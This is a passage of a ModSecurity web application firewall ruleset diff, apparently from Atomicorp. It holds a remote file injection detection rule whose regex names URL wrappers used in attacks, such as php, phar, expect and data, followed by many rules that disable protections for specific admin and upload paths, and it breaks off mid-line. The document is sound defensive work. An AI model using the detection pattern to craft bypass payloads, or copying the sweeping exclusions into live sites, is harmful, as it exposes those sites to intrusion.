ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:embed_code|!ARGS:/^input_/|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:input_50|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:wlp|!ARGS:hp|!ARGS:refsrc|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:input_3|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:sfhome|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/^obj_/|!ARGS:direct|!ARGS:fflv|!ARGS:direct|!ARGS:source_location/|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:go|!ARGS:resolution|!ARGS:catalogue_search_code|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:/^utm/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:clickTag1|!ARGS:rf|!ARGS:payment_home|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:lec_rm|!ARGS:n-state|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:/^clickTagFrame/|!ARGS:/^attr/|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:/^V_feed/|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:/^GARS_existing/|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:/body/|!ARGS:/^product_long/|!ARGS:/server/|!ARGS:/content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:/footer/|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:item[content]|!ARGS:pathToPiwik|!ARGS:email_sig|!ARGS:minicms_content|!ARGS:feed|!ARGS:/^artsee_banner_/|!ARGS:fetch|!ARGS:pingback_service|!ARGS:/hostname/|!ARGS:/http/|!ARGS:f_content|!ARGS:email_forward|!ARGS:bannercode|!ARGS:mesg|!ARGS:forward|!ARGS:atc_content|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:question_content|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:file_contents|!ARGS:contents|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:stretch|!ARGS:cat_sponsor|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:faqText|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:paypal_ipn|!ARGS:title|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:wp_home|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:vars[DBhostname]|!ARGS:base1|!ARGS:cart_header|!ARGS:layout|!ARGS:short_story|!ARGS:/sponsor_banner/|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:savecontent|!ARGS:agendWebPage|!ARGS:/ftp/|!ARGS:gen_header|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:c_msg|!ARGS:note|!ARGS:domain|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:clickTAG|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:home|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:helpbox|!ARGS:redir|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:filecontent|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:oldmsg|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:goto|!ARGS:from|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:msgpreview|!ARGS:fb_ref|!ARGS:notes|!ARGS:pn_domain|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:pp_bio_content|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:BLK_block_content|!ARGS:ret|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:area|!ARGS:content|!ARGS:/^data\[tt_content\]/|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:newcontent|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:home_top|!ARGS:Store_OUI_GlobalFooter|!ARGS:map|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:cta_content|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:cta_content|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:code|!ARGS:p_content|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,multimatch,id:320165,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{MATCHED_VAR}',chain"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_92130
+
+SecRule REQUEST_FILENAME "/link_list\.js\.php" "phase:2,id:92131,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340003,ctl:ruleRemovebyID=340020,ctl:ruleRemovebyID=340158"
+
+SecRule REQUEST_FILENAME "/ajax_get_file_listing\.php" "phase:2,id:92132,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/cgi-bin/send\.pl" "phase:2,id:92133,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340158,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=341049,ctl:ruleRemovebyID=340157"
+
+SecRule REQUEST_FILENAME "/send_mail_with_attachment\.php" "phase:2,id:92134,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/ts_manage\.php" "phase:2,id:92135,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/plugins/eqdkp_uploader/dialog\.php" "phase:2,id:92136,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/plugins/eqdkp_lightbox/dialog\.php" "phase:2,id:92137,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/addeditproperties\.php" "phase:2,id:92138,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/muokkaa_suomi\.php" "phase:2,id:92139,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/cms/setpage\.php" "phase:2,id:92140,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/quick_updates\.php" "phase:2,id:92141,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"
+
+SecRule REQUEST_FILENAME "/custom404css\.php" "phase:2,id:92142,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/extra_info_pages\.php" "phase:2,id:92143,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/wp-admin/edit-tags\.php" "phase:2,id:92144,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/qrcode/img\.php" "phase:2,id:92145,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/randomimage\.php" "phase:2,id:92146,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/acp/user\.php" "phase:2,id:92147,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/save_page_settings\.php" "phase:2,id:92148,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/changedata\.php" "phase:2,id:92149,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/cadmin/index\.php" "phase:2,id:92150,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/magento/index\.php/banner" "phase:2,id:92151,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/factor_edit\.php" "phase:2,id:92152,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/admin/options/editpl\.php" "phase:2,id:92153,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/upload/scripts/ajax\.sfsyncphotos\.php" "phase:2,id:92154,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/adminepharmac\.php" "phase:2,id:92155,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/siteadmin/leafs/addinline" "phase:2,id:92156,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/dmxeditor/dialogs/upload\.php" "phase:2,id:92157,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/plugins/system/phpimageeditor/index\.php" "phase:2,id:92158,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/galeria/thumbs\.php" "phase:2,id:92159,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/prize_posting\.php" "phase:2,id:92160,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/clientservices\.php" "phase:2,id:92161,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/ajax_save_name\.php" "phase:2,id:92162,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/ckeditor/xss" "phase:2,id:92163,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/muuta\.php" "phase:2,id:92164,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin-osb\.php" "phase:2,id:92165,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/envoi-code\.html" "phase:2,id:92166,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711,ctl:ruleRemovebyID=380018"
+
+SecRule REQUEST_FILENAME "/tiki-edit_css\.php" "phase:2,id:92167,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/admin/index\.cfm" "phase:2,id:92168,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/e107_plugins/sgallery/showpic\.php" "phase:2,id:92169,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/modules/mod_rar_radio/tmpl/player/player\.php" "phase:2,id:92170,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/editpackage\.php" "phase:2,id:92171,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/systeembeheer/mysql" "phase:2,id:92172,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/view_system_style_source\.php" "phase:2,id:92173,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/admin/autorisierung\.php" "phase:2,id:92174,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/updatetemp\.html" "phase:2,id:92175,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/admin_zoej\.php" "phase:2,id:92176,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/content/item/edit/" "phase:2,id:92177,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/cgi-bin/helpdesk/ajax\.cgi" "phase:2,id:92178,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/ajax_image_thumbnail\.php" "phase:2,id:92179,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/ajax_delete_file\.php" "phase:2,id:92180,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/tools/reacties\.php" "phase:2,id:92181,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/administration/basic_settings\.php" "phase:2,id:92182,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/fdlhq/admin/config\.php" "phase:2,id:92183,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/admin-osb\.php" "phase:2,id:92184,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/sysext/tstemplate/" "phase:2,id:92185,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/dbadmin/" "phase:2,id:92186,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleR